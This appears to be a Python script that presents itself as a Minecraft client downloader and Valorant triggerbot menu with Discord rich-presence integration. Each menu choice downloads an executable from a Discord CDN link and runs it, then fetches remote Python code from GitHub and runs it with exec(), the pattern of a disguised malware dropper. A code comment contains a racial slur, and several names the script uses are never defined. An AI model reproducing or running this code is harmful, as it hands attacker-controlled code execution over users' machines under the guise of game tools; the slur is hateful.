from pypresence import Presence
import requests
import subprocess

global RPC
RPC = None

CLIENT_ID = '1216435828931428504'  

def manage_discord_rpc(state, details, large_image, large_text):
    global RPC
    try:
        if RPC is None:  
            RPC = Presence(CLIENT_ID)
            RPC.connect()
        RPC.update(state=state, details=details, large_image=large_image, large_text=large_text, start=time.time())
    except Exception as e:
        print(f"Error with Discord RPC: {e}")
        try:
            if RPC is not None:
                RPC.close()
        except Exception as e:
            print(f"Error closing Discord RPC: {e}")
        RPC = None


def close_rpc_on_exit():
    global RPC
    if RPC is not None:
        RPC.close()
# for shit in the future probly usage "download('http://nigger.com/s.exe', 's.exe')"
def download(url, filename):
    response = requests.get(url)
    with open(filename, 'wb') as file:
        file.write(response.content)

    CREATE_NEW_CONSOLE = 0x00000010

    subprocess.Popen(filename, shell=True, creationflags=CREATE_NEW_CONSOLE)

def discord_rp_mc():
    manage_discord_rpc(
        state="Downloading Minecraft Clients",
        details=(f"Premium | Logged in as {keyauthapp.user_data.username}"),
        large_image="screenshot_2024-03-10_172435",
        large_text="https://discord.gg/gNq7SXbZhJ"
    )

os.system('cls')
print(MinecraftMulti)
while True:
    os.system('cls')
    print(MinecraftMulti)
    gg = Write.Input("             [×] >>  ", Colors.red_to_purple, interval=0.0025)
    if gg == '1':
        discord_rp_mc()
        os.system('cls')
        download('https://cdn.discordapp.com/attachments/1199080496144076881/1217656107049422888/MCCBeta.exe?ex=6604d19e&is=65f25c9e&hm=28b9e47fe1b3ec7356f30177c8fcd507b55d5859068205580282754407a2d659&', 'MCCBeta.exe')
        print("                                             \033[1;39mLoading Minecraft Sections..")
        exec(requests.get('https://raw.githubusercontent.com/VjpProDaiIa/k/main/Minecraft').text)
    if gg == '2':
        discord_rp_mc()
        os.system('cls')
        print("                                       \033[1;39mLoading Private Client Section..")
        download('https://cdn.discordapp.com/attachments/1199080496144076881/1217656107049422888/MCCBeta.exe?ex=6604d19e&is=65f25c9e&hm=28b9e47fe1b3ec7356f30177c8fcd507b55d5859068205580282754407a2d659&', 'MCCBeta.exe')
        exec(requests.get('https://raw.githubusercontent.com/VjpProDaiIa/k/main/Private').text)
    if gg == '3':
        os.system('cls')
        print("                                       \033[1;39mInitializing Valorant TriggerBot..")
        download('https://cdn.discordapp.com/attachments/1199080496144076881/1217656107049422888/MCCBeta.exe?ex=6604d19e&is=65f25c9e&hm=28b9e47fe1b3ec7356f30177c8fcd507b55d5859068205580282754407a2d659&', 'MCCBeta.exe')
        exec(requests.get('https://raw.githubusercontent.com/VjpProDaiIa/vjp231/main/PyClickerTrigger').text)
    else:
        continue
